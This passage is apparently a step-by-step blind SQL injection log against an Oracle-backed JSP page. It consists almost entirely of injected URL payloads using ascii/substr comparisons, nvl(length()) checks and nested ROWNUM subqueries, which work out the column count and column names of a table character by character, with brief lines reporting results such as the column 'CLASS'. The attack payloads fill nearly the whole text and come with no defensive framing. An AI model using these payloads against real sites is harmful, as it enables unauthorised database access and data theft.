www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 53=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 53>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 51>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 50=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 50>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 48=ascii(substr((SELECT COUNT(*) FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

Determining the length of the first column name of this table, CLASS: 5

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 5<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 9>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 7=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 7>nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 5=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

Determining the first character of the first column name: C

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 68>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 66=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 66>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

Determining the second character of the first column name: L

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 73>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 76=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

Determining the third character of the first column name: A

www.test.net/index_kaoyan_view.jsp?id=117 And 76=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 83>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 84=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 84>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 81=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 81>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 82>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))

The following guesses the second column:

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 5<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 9>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 7=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 74=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 74>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 72=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 72=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 81=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 81>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 76=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 76>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 74=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 74>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

